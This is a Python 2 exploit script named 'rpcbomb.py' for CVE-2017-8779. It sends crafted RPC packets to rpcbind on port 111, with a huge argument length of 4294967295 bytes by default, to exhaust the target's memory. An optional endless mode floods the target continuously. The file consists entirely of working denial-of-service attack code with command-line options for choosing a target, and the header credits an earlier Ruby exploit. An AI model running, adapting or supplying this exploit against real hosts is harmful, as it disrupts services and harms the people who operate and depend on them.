#!/usr/bin/env python2 # # CVE-2017-8779 aka rpcbomb.py # python implementation of rpcbomb # find page of bug author here: https://guidovranken.wordpress.com/ # original ruby exploit: https://www.exploit-db.com/exploits/41974 # CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779 # # this one comes with loop and single packet, to consume memory over time and not just once # # i was not able to observe any sort of crash or alike # on the testsystem the cpu consumption went up to 50% (1 CPU) # memory allocation was done # syslogd reportedly mentions out of memory from rpcbind # depending on the environment and service offered probably interesting # # one packet # ./rpcbomb.py -t 127.0.0.1 # # define memory allocation # ./rpcbomb.py -t 127.0.0.1 -l 1024 # # endless mode # ./rpcbomb.py -t 127.0.0.1 -e # # 2nd June 2017 # by dash import os import sys import struct import socket import argparse def run(args): ip = args.ip paylen = args.malloc port = args.port pkt = struct.pack('!I',0) # xid pkt += struct.pack('!I',0) # message type CALL pkt += struct.pack('!I',2) # RPC version 2 pkt += struct.pack('!I',100000) # Program pkt += struct.pack('!I',4) # Program version pkt += struct.pack('!I',9) # Procedure pkt += struct.pack('!I',0) # Creds AUTH_NULL pkt += struct.pack('!I',0) # Creds len 0 pkt += struct.pack('!I',0) # Creds AUTH_NULL pkt += struct.pack('!I',0) # Creds len 0 pkt += struct.pack('!I',0) # Program: 0 pkt += struct.pack('!I',0) # Ver pkt += struct.pack('!I',4) # Proc pkt += struct.pack('!I',4) # Argument length pkt += struct.pack('!I',paylen) # Payloadlen while 1: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(pkt, (ip, port)) data, addr = s.recvfrom(16384) print '.', sys.stdout.flush() if not args.endless: break print print 'Done' def main(): parser_desc = 'rpcbomb - python exploit by dash' prog_desc = 'portbind memory exhaustion exploit' parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc) parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip') parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int) parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int) parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless') args = parser.parse_args() run(args) if __name__ == "__main__": main()